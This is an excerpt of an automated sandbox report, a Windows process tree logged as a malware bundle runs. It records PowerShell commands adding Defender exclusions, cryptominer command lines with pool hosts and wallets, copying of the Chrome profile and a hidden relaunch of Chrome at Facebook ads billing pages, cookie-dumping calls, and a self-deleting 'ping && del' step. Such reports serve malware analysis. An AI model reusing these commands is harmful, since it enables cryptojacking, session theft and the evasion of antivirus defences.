- Modifies data under HKEY_USERS
PID:5928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vpvbcszrmgk\dlhyb25fezb.exe"C:\Users\Admin\AppData\Local\Temp\vpvbcszrmgk\dlhyb25fezb.exe" /quiet SILENT=1 AF=7568⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5272 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\vpvbcszrmgk\dlhyb25fezb.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\vpvbcszrmgk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616681151 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:3760
-
-
-
C:\Users\Admin\AppData\Local\Temp\fjyewmr4cxd\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\fjyewmr4cxd\setup_10.2_us3.exe" /silent8⤵PID:7600
-
-
C:\Users\Admin\AppData\Local\Temp\0hu1hseuy25\vict.exe"C:\Users\Admin\AppData\Local\Temp\0hu1hseuy25\vict.exe" /VERYSILENT /id=5358⤵PID:10088
-
C:\Users\Admin\AppData\Local\Temp\is-S6EJO.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-S6EJO.tmp\vict.tmp" /SL5="$108E0,870426,780800,C:\Users\Admin\AppData\Local\Temp\0hu1hseuy25\vict.exe" /VERYSILENT /id=5359⤵PID:700
-
C:\Users\Admin\AppData\Local\Temp\is-3IV1N.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-3IV1N.tmp\winhost.exe" 53510⤵PID:6876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\s0cihbe5icd\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\s0cihbe5icd\Setup3310.exe" /Verysilent /subid=5778⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\is-3EN0I.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-3EN0I.tmp\Setup3310.tmp" /SL5="$108DA,138429,56832,C:\Users\Admin\AppData\Local\Temp\s0cihbe5icd\Setup3310.exe" /Verysilent /subid=5779⤵PID:10000
-
C:\Users\Admin\AppData\Local\Temp\is-0BIVT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0BIVT.tmp\Setup.exe" /Verysilent10⤵PID:10356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2pbmizjm12x\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\2pbmizjm12x\AwesomePoolU1.exe"8⤵PID:8256
-
-
C:\Users\Admin\AppData\Local\Temp\y4lst21hslx\s35x5lnd2qo.exe"C:\Users\Admin\AppData\Local\Temp\y4lst21hslx\s35x5lnd2qo.exe" /ustwo INSTALL8⤵PID:1584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 6489⤵
- Program crash
PID:10328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 6649⤵
- Program crash
PID:10420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 7009⤵
- Program crash
PID:10528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 8009⤵
- Program crash
PID:10592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 8809⤵
- Program crash
PID:10688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 9209⤵
- Program crash
PID:10888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 11489⤵
- Program crash
PID:11000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 9969⤵
- Program crash
PID:11120
-
-
-
C:\Users\Admin\AppData\Local\Temp\l0durbkdhtm\ihhgdubkkpm.exe"C:\Users\Admin\AppData\Local\Temp\l0durbkdhtm\ihhgdubkkpm.exe" /1-6108⤵PID:10164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Wispy-Mountain'9⤵PID:8624
-
-
C:\Program Files (x86)\Wispy-Mountain\7za.exe"C:\Program Files (x86)\Wispy-Mountain\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:11032
-
-
C:\Program Files (x86)\Wispy-Mountain\ihhgdubkkpm.exe"C:\Program Files (x86)\Wispy-Mountain\ihhgdubkkpm.exe" /1-6109⤵PID:4128
-
C:\Program Files (x86)\Wispy-Mountain\ihhgdubkkpm.exe"C:\Program Files (x86)\Wispy-Mountain\ihhgdubkkpm.exe" /1-61010⤵PID:10160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ucyoypit2k3\app.exe"C:\Users\Admin\AppData\Local\Temp\ucyoypit2k3\app.exe" /8-238⤵PID:4644
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Lingering-Sound'9⤵PID:5332
-
-
C:\Program Files (x86)\Lingering-Sound\7za.exe"C:\Program Files (x86)\Lingering-Sound\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:10844
-
-
C:\Program Files (x86)\Lingering-Sound\app.exe"C:\Program Files (x86)\Lingering-Sound\app.exe" /8-239⤵PID:10456
-
C:\Program Files (x86)\Lingering-Sound\app.exe"C:\Program Files (x86)\Lingering-Sound\app.exe" /8-2310⤵PID:7356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yx2wsm4haqi\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\yx2wsm4haqi\setup_10.2_us3.exe" /silent8⤵PID:8596
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0K6MANBUPX\setups.exe"C:\Users\Admin\AppData\Local\Temp\0K6MANBUPX\setups.exe" ll5⤵
- Executes dropped EXE
PID:1672 -
C:\Users\Admin\AppData\Local\Temp\is-5CDRA.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-5CDRA.tmp\setups.tmp" /SL5="$6028C,408070,216064,C:\Users\Admin\AppData\Local\Temp\0K6MANBUPX\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:204
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:500
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
PID:3460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Suspicious use of FindShellTrayWindow
PID:5388 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1896 /prefetch:86⤵PID:5980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1636 /prefetch:86⤵PID:5972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1580 /prefetch:26⤵PID:5964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:16⤵PID:4036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:16⤵PID:2944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:16⤵PID:1476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:16⤵PID:1748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:16⤵PID:4380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:16⤵PID:2648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4788 /prefetch:86⤵PID:5104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5068 /prefetch:86⤵PID:5076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1560 /prefetch:86⤵PID:4444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,4114313545711555391,4231953626598031350,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1352 /prefetch:86⤵PID:4400
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
PID:5680 -
C:\Users\Admin\AppData\Roaming\414B.tmp.exe"C:\Users\Admin\AppData\Roaming\414B.tmp.exe"5⤵PID:5728
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4932
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
PID:6404
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:6216
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6408
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:6492
-
C:\ProgramData\6825413.exe"C:\ProgramData\6825413.exe"5⤵PID:7432
-
-
C:\ProgramData\7012278.exe"C:\ProgramData\7012278.exe"5⤵
- Suspicious behavior: SetClipboardViewer
PID:7460
-
-
C:\ProgramData\6982577.exe"C:\ProgramData\6982577.exe"5⤵PID:7528
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:7584
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7232
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:504
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7820
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:7940
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4712
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4808
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:3988
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffe08506e00,0x7ffe08506e10,0x7ffe08506e201⤵PID:5428
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
PID:1776 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding EDDE72C9305D8C3A8067D506B6E97D25 C2⤵
- Loads dropped DLL
PID:6292
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F3EBDAF1E2F11AF42F265969BA4C80CA2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5876
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
- Drops file in Windows directory
PID:5128 -
C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=756 -BF=default -uncf=default3⤵
- Loads dropped DLL
- Adds Run key to start application
PID:4852 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--anbfs"4⤵
- Checks computer location settings
PID:5964 -
C:\Users\Admin\AppData\Roaming\Weather\Weather.exeC:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1ec,0x1e8,0x1e4,0x1a0,0x1e0,0x7ffe08b99ec0,0x7ffe08b99ed0,0x7ffe08b99ee05⤵PID:1664
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=1756 /prefetch:85⤵PID:4752
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:25⤵PID:7096
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2524 /prefetch:15⤵
- Checks computer location settings
PID:7020
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=2224 /prefetch:85⤵PID:5384
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=3392 /prefetch:85⤵PID:7200
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1880 /prefetch:25⤵PID:8024
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=3204 /prefetch:85⤵PID:7448
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=3564 /prefetch:85⤵PID:4640
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=3296 /prefetch:85⤵PID:956
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=3528 /prefetch:85⤵PID:6960
-
-
C:\Users\Admin\AppData\Roaming\Weather\Weather.exe"C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,6837750421255568738,2866033308812469876,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5964_702545850" --mojo-platform-channel-handle=2180 /prefetch:85⤵PID:2708
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEBE5.bat" "3⤵PID:4592
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Checks SCSI registry key(s)
PID:4824
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Roaming\Weather\Weather\PREREQ~1"4⤵
- Views/modifies file attributes
PID:5676
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:8072
-
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\System32\timeout.exe 54⤵
- Delays execution with timeout.exe
PID:7860
-
-
C:\Windows\SysWOW64\attrib.exeC:\Windows\System32\attrib.exe -r "C:\Users\Admin\AppData\Local\Temp\EXEBE5.bat"4⤵
- Views/modifies file attributes
PID:5600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" del "C:\Users\Admin\AppData\Local\Temp\EXEBE5.bat" "4⤵PID:6316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" cls"4⤵PID:5156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EXEB96.bat" "3⤵
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6348 -
